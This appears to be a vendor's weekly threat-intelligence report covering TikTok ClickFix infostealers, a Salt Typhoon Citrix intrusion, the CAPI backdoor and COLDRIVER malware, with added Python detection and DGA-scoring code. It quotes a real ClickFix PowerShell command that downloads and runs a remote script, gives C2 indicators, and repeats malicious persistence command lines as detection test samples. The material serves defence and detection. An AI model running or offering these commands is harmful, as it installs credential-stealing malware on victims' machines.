DigiCert’s Open-Source Intelligence (OSINT) Report – October 17 – October 23, 2025


Here is your weekly summary of news and other public coverage relevant to Vercara, the market leader in DNS, DDoS Mitigation, Web Application Firewalls, and Bot Management. Keep reading to learn about the week’s interesting and informative stories. To see all the OSINT reports, click here.

NOTE: Except where indicated, this report is released as TLP: CLEAR and items in it may be shared but not attributed to Vercara. For more information on the Traffic Light Protocol, the definitions and usage are at https://www.first.org/tlp/.

TikTok Videos Continue to Push Infostealers in ClickFix Attacks

(TLP: CLEAR) Recent threat intelligence has highlighted a rise in ClickFix-style attacks propagated through TikTok videos, where cybercriminals use social engineering to trick users into executing malicious PowerShell commands. These videos often claim to offer free activation or cracked versions of popular software such as Windows, Microsoft 365, Adobe Premiere, CapCut Pro, or Discord Nitro. Victims are instructed to open PowerShell with administrator privileges and run a single-line command such as iex (irm slmgr.win/photoshop), which uses PowerShell’s Invoke-Expression and Invoke-RestMethod to retrieve and execute a remote script from a malicious domain (e.g., slmgr.win). Once executed, this script downloads two executable payloads hosted on Cloudflare services: updater.exe and source.exe. The first is a known variant of the AuroStealer (also called Aura Stealer) infostealer malware. It is designed to exfiltrate sensitive user data, including browser-stored credentials, authentication cookies, crypto wallet contents, and application-specific credentials. The second payload, source.exe, is a .NET binary that uses the built-in C# compiler (csc.exe) at runtime to compile and inject additional code into memory, likely for further exploitation or to establish persistence, though its full behavior is not yet fully understood.

(TLP: CLEAR) Comments: This campaign underscores the increasing use of social platforms, particularly TikTok, as vectors for malware delivery, leveraging trust in community-shared content and user interest in free or pirated software. Once the malicious chain is executed, compromised systems should be considered fully exposed, with all stored credentials assumed stolen. Victims are advised to reset passwords across all services and enable multi-factor authentication wherever possible. Additionally, organizations should educate users to avoid running unfamiliar shell commands from untrusted sources and implement endpoint defenses capable of detecting script-based threats, fileless malware execution, and credential theft.

(TLP: CLEAR) Recommended best practices/regulations: NIST SP 800-53 Rev5 SI-3: “MALICIOUS CODE PROTECTION

Control:

  • Implement [Selection (one or more): signature based; non-signature based] malicious code protection mechanisms at system entry and exit points to detect and eradicate malicious code.
  • Automatically update malicious code protection mechanisms as new releases are available in accordance with organizational configuration management policy and procedures.
  • Configure malicious code protection mechanisms to: 1. Perform periodic scans of the system [Assignment: organization-defined frequency] and real-time scans of files from external sources at [Selection (one or more): endpoint; network entry and exit points] as the files are downloaded, opened, or executed in accordance with organizational policy; and 2. [Selection (one or more): block malicious code; quarantine malicious code; take [Assignment: organization-defined action]]; and send alert to [Assignment: organization-defined personnel or roles] in response to malicious code detection.
  • Address the receipt of false positives during malicious code detection and eradication and the resulting potential impact on the availability of the system.”

NIST requires malware detection and prevention solutions. This can be on the device, as with anti-virus agents, but also can be augmented by Protective DNS provided by the network that the device is on or across the Internet. This provides defense-in-depth and support for devices such as Internet of Things (IoT) or some servers that cannot run an endpoint client.

(TLP: CLEAR) DigiCert: DigiCert’s Protective DNS solution, UltraDDR (DNS Detection and Response), filters internal DNS responses for both users and machines, using defined categories (including botnet Command and Control (C2)) together with machine learning that detects previously uncategorized malicious associations, helping to prevent data exfiltration and malware detonation.

Source: https://www.bleepingcomputer.com/news/security/tiktok-videos-continue-to-push-infostealers-in-clickfix-attacks/ 

Salt Typhoon Uses Citrix Flaw in Global Cyber-Attack

(TLP: CLEAR) The China-linked advanced persistent threat (APT) group known as Salt Typhoon (also tracked as Earth Estries, GhostEmperor, or UNC2286) exploited a Citrix NetScaler Gateway vulnerability to breach a European telecommunications organization. This campaign, first identified by Darktrace in early July 2025, is part of Salt Typhoon’s broader operations targeting over 80 countries across critical sectors such as telecommunications, energy, and government. The attackers leveraged a vulnerability in Citrix’s edge infrastructure to gain initial access, then pivoted laterally to Citrix Virtual Delivery Agent (VDA) hosts within the organization’s Machine Creation Services (MCS) subnet. The group employed DLL side-loading techniques to deploy a custom backdoor known as SNAPPYBEE (also called Deed RAT). This method involved placing a malicious DLL alongside legitimate antivirus executables, such as those from Norton, Bkav, or IObit, allowing the malware to be executed under the guise of trusted software. Once inside, Salt Typhoon established communication with its command-and-control (C2) infrastructure using multiple covert channels, including HTTP traffic with forged Internet Explorer headers and unidentified TCP-based protocols. These C2 endpoints were hosted on virtual private servers provided by LightNode, with at least one domain previously linked to Salt Typhoon operations. The attackers further obscured their origin by initiating access through a SoftEther VPN node, complicating attribution and detection.

(TLP: CLEAR) Comments: The tactics observed in this campaign reflect Salt Typhoon’s emphasis on stealth, persistence, and abuse of legitimate software and network appliances. Their use of living-off-the-land techniques and manipulation of trusted binaries highlights the challenges defenders face in distinguishing malicious from benign behavior. Organizations operating Citrix NetScaler appliances or similar edge infrastructure are especially at risk and should ensure timely patching, network segmentation, and enhanced monitoring. Standard antivirus tools are unlikely to detect such sophisticated threats; instead, behavioral analysis and anomaly detection capabilities are essential. The incident serves as a critical reminder of the importance of securing perimeter devices, monitoring unusual DLL activity, and scrutinizing outbound traffic for covert C2 channels.

(TLP: CLEAR) Recommended best practices/regulations: NIST Cybersecurity Framework (CSF) DE.CM-01: “Networks and network services are monitored to find potentially adverse events”. One of the ways to detect phishing, malware droppers, and command and control (C2) is at the network level. Intrusion Detection Systems (IDS), Intrusion Prevention Systems (IPS), and next-generation firewalls can be used with a protective DNS solution to detect these malicious activities as they traverse the network, even if the initial infection occurs via physical media or on another network such as a hotel or airport.

OWASP Web Application Firewall: “A ‘web application firewall (WAF)’ is an application firewall for HTTP applications. It applies a set of rules to an HTTP conversation. Generally, these rules cover common attacks such as Cross-site Scripting (XSS) and SQL Injection. While proxies generally protect clients, WAFs protect servers. A WAF is deployed to protect a specific web application or set of web applications. A WAF can be considered a reverse proxy. WAFs may come in the form of an appliance, server plugin, or filter, and may be customized to an application. The effort to perform this customization can be significant and needs to be maintained as the application is modified.”

(TLP: CLEAR) DigiCert: DigiCert’s Protective DNS solution, UltraDDR (DNS Detection and Response), uses Cyber Threat Intelligence feeds, domain categories, and other detection engines to assess DNS queries in real time and block domains that are being used for phishing, malware delivery, and malware Command and Control (C2). This reduces the quantity and impact of malware infections.

DigiCert’s Web Application Firewall, UltraWAF, protects your applications from data breaches, defacements, malicious bots, and other web application-layer attacks. By protecting your applications no matter where they are hosted, UltraWAF simplifies your operations through consistently configured rules with no provider restrictions or hardware requirements.

Source: https://www.infosecurity-magazine.com/news/salt-typhoon-citrix-flaw-cyber/

Source: https://thehackernews.com/2025/10/hackers-used-snappybee-malware-and.html 

New .NET CAPI Backdoor Targets Russian Auto and E-Commerce Firms via Phishing ZIPs

(TLP: CLEAR) In October 2025, cybersecurity researchers from Seqrite Labs identified a novel .NET-based backdoor malware dubbed CAPI Backdoor, which appears to be part of a targeted phishing campaign aimed at Russian automobile and e-commerce organizations. The campaign uses spear-phishing emails that deliver a ZIP archive (first seen uploaded to VirusTotal on October 3, 2025) whose name mimics a payroll notification in Russian (e.g., “Перерасчёт заработной платы 01.10.2025”). Inside the ZIP is a decoy Russian-language document (purporting to reference income tax or salary recalculation) and a malicious Windows shortcut (LNK) file bearing the same name. When a user executes the LNK file, the system launches the legitimate Windows binary rundll32.exe to load a .NET DLL payload (typically named adobe.dll) from the user’s Roaming folder. This living-off-the-land (LotL) technique enables the malicious code to evade heuristics by piggybacking on trusted system binaries. After execution, the implant performs privilege enumeration (checking for administrative rights), enumerates installed antivirus products, and launches the decoy document to distract the user while stealthy activities occur.

(TLP: CLEAR) Comments: The backdoor connects to a hardcoded command-and-control (C2) server at 91.223.75[.]96 and is capable of receiving tasking that includes: harvesting browser data (from Chrome, Microsoft Edge and Firefox), capturing screenshots, collecting system information, enumerating folder contents, and exfiltrating the gathered data back to the attacker. To maintain persistence, the malware uses two main mechanisms: creation of a scheduled task (named for example “AdobePDF”) set to run periodically, and dropping a shortcut (LNK) in the Windows Startup folder that invokes rundll32.exe pointing to the malicious DLL in the Roaming folder. The researchers believe the targeting is specific to the Russian auto sector because one of the domains associated with the campaign is carprlce[.]ru, an impostor of the legitimate Russian site carprice[.]ru. This domain suggests reconnaissance and lure development tailored to the automotive industry in Russia. Overall, the CAPI Backdoor campaign exemplifies a modern targeted attack: leveraging culturally relevant phishing lures, abusing legitimate system binaries for stealth execution, employing anti-analysis and persistence techniques, and focusing on credential/session theft from browsers and systems. Organizations in the Russian automobile and online commerce verticals (and their supply-chain partners) should treat this malware as a high risk, inspect for rundll32.exe executions with unusual DLLs, monitor for scheduled tasks and startup shortcuts pointing to user Roaming directories, and block or monitor outgoing traffic to the identified IP/domain indicators.
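
As an added example (not code from the report or any of its sources), the following Python detection logic runs over a few constructed process-creation records and flags the two execution patterns the report describes: the ClickFix PowerShell download cradle (iex together with irm) from the TikTok item, and rundll32.exe loading, or schtasks.exe persisting, a DLL from the user's Roaming folder as in the CAPI Backdoor item above. The ProcEvent field names, the thresholds and the sample command lines are assumptions modelled on the report's indicators (slmgr.win, adobe.dll, the AdobePDF task name).

```python
import re
from dataclasses import dataclass

# Minimal process-creation record. The field names are an assumption made for
# this example; map them onto your EDR or Sysmon Event ID 1 fields as needed.
@dataclass
class ProcEvent:
    image: str      # path of the started executable
    cmdline: str    # full command line

# Rule 1: ClickFix-style download cradle, e.g. "iex (irm slmgr.win/photoshop)".
# Both an Invoke-Expression and a download cmdlet must be present, in any order,
# so "irm ... | iex" is caught as well as "iex (irm ...)".
IEX_TOKEN = re.compile(r"(?i)\b(iex|invoke-expression)\b")
DOWNLOAD_TOKEN = re.compile(r"(?i)\b(irm|invoke-restmethod|iwr|invoke-webrequest)\b")
# Rules 2 and 3: a DLL living under the user's Roaming profile.
ROAMING_DLL = re.compile(r"(?i)\\appdata\\roaming\\[^\s\"']*\.dll")

def detect(event: ProcEvent) -> list[str]:
    """Return the rule names this event trips; an empty list means no finding."""
    hits = []
    name = event.image.lower().rsplit("\\", 1)[-1]
    cmd = event.cmdline
    if name in ("powershell.exe", "pwsh.exe"):
        if IEX_TOKEN.search(cmd) and DOWNLOAD_TOKEN.search(cmd):
            hits.append("powershell_iex_download_cradle")
    if name == "rundll32.exe" and ROAMING_DLL.search(cmd):
        hits.append("rundll32_roaming_dll")
    if name == "schtasks.exe" and "/create" in cmd.lower() and ROAMING_DLL.search(cmd):
        hits.append("schtasks_persisting_roaming_dll")
    return hits

# Constructed sample telemetry: three malicious lines modelled on the report's
# indicators and two benign lines that must not fire.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe iex (irm slmgr.win/photoshop)"),
    ProcEvent(r"C:\Windows\System32\rundll32.exe",
              r'rundll32.exe "C:\Users\alice\AppData\Roaming\adobe.dll",Entry'),
    ProcEvent(r"C:\Windows\System32\schtasks.exe",
              r'schtasks.exe /create /tn AdobePDF /sc minute /mo 15 '
              r'/tr "rundll32.exe C:\Users\alice\AppData\Roaming\adobe.dll,Entry"'),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe Invoke-RestMethod https://intranet.example/health"),
    ProcEvent(r"C:\Windows\System32\rundll32.exe",
              "rundll32.exe shell32.dll,Control_RunDLL"),
]

def triage(events):
    """Return (command line, rule hits) for every event that matched a rule."""
    return [(e.cmdline, detect(e)) for e in events if detect(e)]

if __name__ == "__main__":
    for cmdline, hits in triage(SAMPLE_EVENTS):
        print(", ".join(hits), "<-", cmdline)
```

Treat a hit as a triage lead rather than a verdict: legitimate installers also use rundll32.exe and Roaming paths, so pair the rule with the parent process and the DLL's signature status before acting.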

(TLP: CLEAR) Recommended best practices/regulations: NIST Cybersecurity Framework (CSF) DE.CM-01: “Networks and network services are monitored to find potentially adverse events”. One of the ways to detect phishing, malware droppers, and command and control (C2) is at the network level. Intrusion Detection Systems (IDS), Intrusion Prevention Systems (IPS), and next-generation firewalls can be used with a protective DNS solution to detect these malicious activities as they traverse the network, even if the initial infection occurs via physical media or on another network such as a hotel or airport.

(TLP: CLEAR) DigiCert: DigiCert’s Protective DNS solution, UltraDDR (DNS Detection and Response), uses Cyber Threat Intelligence feeds, domain categories, and other detection engines to assess DNS queries in real time and block domains that are being used for phishing, malware delivery, and malware Command and Control (C2). This reduces the quantity and impact of malware infections.

Source: https://thehackernews.com/2025/10/new-net-capi-backdoor-targets-russian.html  

Source: https://securitybeyondtaboo.com/new-net-capi-backdoor-targets-russian-auto-e-commerce-via-phishing-zips/?utm_source=chatgpt.com 

Google Identifies Three New Russian Malware Families Created by COLDRIVER Hackers

(TLP: CLEAR) Google’s Threat Intelligence Group (GTIG) revealed that the Russia-linked hacking collective known as COLDRIVER has developed three new families of malware, marking a significant uptick in the group’s operational tempo and sophistication. According to the GTIG, these malware variants emerged from rapid development cycles since May 2025, indicating that COLDRIVER is actively refining and expanding its toolkit. The new families are reportedly tailored to support targeted missions, including intelligence collection and persistent intrusion, aligning with the actor’s longer-term espionage objectives. Rather than relying on large, well-known “payloads”, the group appears to be moving toward modular, bespoke malware designed for specific target classes and campaigns. The GTIG observed that the new malware families exhibit improved features for stealth, evasion and adaptability. For example, they may include refined payload delivery methods, updated command-and-control (C2) protocols, obfuscation layers, and more targeted lateral movement capabilities within compromised networks. Google’s analysis suggests that COLDRIVER is applying lessons learned from prior campaigns—altering tool architecture, refining persistence mechanisms and rapidly retooling based on detection feedback. This evolution underscores a shift from opportunistic attacks toward tailored, sustained operations targeting high-value entities.

(TLP: CLEAR) Comments: From a defensive standpoint, these developments raise the bar for detection and response. The mass rollout of new malware families means that signature-based protections may lag, and behavioral analytics, endpoint telemetry, network monitoring for anomalous C2 activity, and threat-hunting across lateral movement artifacts become increasingly critical. Organizations in sectors of interest to Russian-linked operators should assume that vulnerabilities in both perimeter infrastructure and internal systems can be leveraged, and that adversaries are prepared with multiple, evolving toolsets to maintain access once inside. In short, the revelation of these three new malware families signifies that COLDRIVER is accelerating its capability development, and defenders must adopt a forward-looking posture to anticipate and counter emergent threats.

(TLP: CLEAR) Recommended best practices/regulations: Cybersecurity & Infrastructure Security Agency Selecting a Protective DNS (PDNS) Service: “A core capability of PDNS is the ability to categorize domain names based on threat intelligence. PDNS services typically leverage open source, commercial, and governmental information feeds of known malicious domains. These feeds enable coverage of domain names found at numerous points of the network exploitation lifecycle. Some solutions may also detect novel malicious domains based on pattern recognition. The types of domains typically addressed by a PDNS system include the following:

  • Malware distribution and command and control: Sites known to serve malicious content or used by threat actors to command-and-control malware. For example, these may include sites hosting malicious JavaScript® files or domains that host advertisements that collect information for undesired profiling. PDNS can block and alert on known malicious connection attempts.
  • Domain generation algorithms: Sites with programmatically generated domain names that are used by malware to circumvent static blocking. Advanced malware – including some botnets – depend on the ability to communicate with command and control (C2) infrastructure. Cyber threat actors use domain generation algorithms (DGAs) for malware to circumvent static blocking – either by domain name or IP – through programmatically generating domain names according to a pre-set seed. PDNS can offer protection from malware DGAs by analyzing every domain’s textual attribute and tagging those associated with known DGA attributes, such as high entropy.”
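
An added example (not CISA's or DigiCert's code) of the textual DGA check the quoted guidance describes: it scores the registrable label of each queried name by Shannon entropy, length and vowel ratio, the kind of per-query feature a resolver can compute without any feed lookup. The split-on-last-dot label extraction and the thresholds are assumptions chosen for illustration.

```python
import math
from collections import Counter

VOWELS = set("aeiou")

def shannon_entropy(s: str) -> float:
    """Bits of entropy per character of s (0.0 for the empty string)."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())

def registrable_label(domain: str) -> str:
    # Assumption: the label left of the last dot is the registrable one. This
    # holds for .com/.ru-style TLDs; a public-suffix list is needed for .co.uk etc.
    parts = domain.lower().rstrip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]

def dga_score(domain: str) -> dict:
    """Textual features of the registrable label, rounded for readability."""
    label = registrable_label(domain)
    letters = [ch for ch in label if ch.isalpha()]
    vowel_ratio = sum(ch in VOWELS for ch in letters) / len(letters) if letters else 0.0
    digit_ratio = sum(ch.isdigit() for ch in label) / len(label) if label else 0.0
    return {
        "label": label,
        "length": len(label),
        "entropy": round(shannon_entropy(label), 3),
        "vowel_ratio": round(vowel_ratio, 3),
        "digit_ratio": round(digit_ratio, 3),
    }

def looks_like_dga(domain: str, entropy_threshold: float = 3.5, min_len: int = 12) -> bool:
    """Tag long, high-entropy, vowel-poor labels. Entropy alone is not enough:
    a long dictionary name scores above 3.5 bits too, so the vowel ratio guards
    against flagging ordinary English words (thresholds are illustrative)."""
    f = dga_score(domain)
    return (f["length"] >= min_len
            and f["entropy"] >= entropy_threshold
            and f["vowel_ratio"] < 0.3)

if __name__ == "__main__":
    # Constructed queries: one DGA-style label, two ordinary names.
    for q in ("xq7zkf9ptwlmbyvs.com", "bleepingcomputer.com", "carprice.ru"):
        print(q, dga_score(q), "DGA-like" if looks_like_dga(q) else "ok")
```

Lookalike domains such as the report's carprlce[.]ru score as benign here; catching those requires the feed-based categorization the quote also describes, not textual features.
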

(TLP: CLEAR) DigiCert: DigiCert’s Protective DNS solution, UltraDDR (DNS Detection and Response), filters internal DNS responses for both users and machines, using defined categories (including botnet Command and Control (C2)) together with machine learning that detects previously uncategorized malicious associations, helping to prevent data exfiltration and malware detonation.

Source: https://thehackernews.com/2025/10/google-identifies-three-new-russian.html 

Traffic Light Protocol (TLP)

Except where noted, this report is released as TLP: CLEAR and items in it may be shared but not attributed to Vercara. For more information on the Traffic Light Protocol, the definitions and usage are at https://www.first.org/tlp/.

About Vercara

The world’s top brands depend on Vercara to safeguard their digital infrastructure and online presence. Vercara offers a suite of cloud-delivered services that are always secure, reliable, and available and enable global businesses to thrive online. UltraSecure protects organizations’ networks and applications against risks and downtime, ensuring that businesses and their customers enjoy exceptional and uninterrupted interactions all day, every day. Delivering the industry’s best performance and always-on service, Vercara’s mission-critical security portfolio provides best-in-class DNS, application, and network security, including DDoS, WAF, and Bot management services to its global 5000 customers and beyond.

To learn more about Vercara solutions, please contact us.
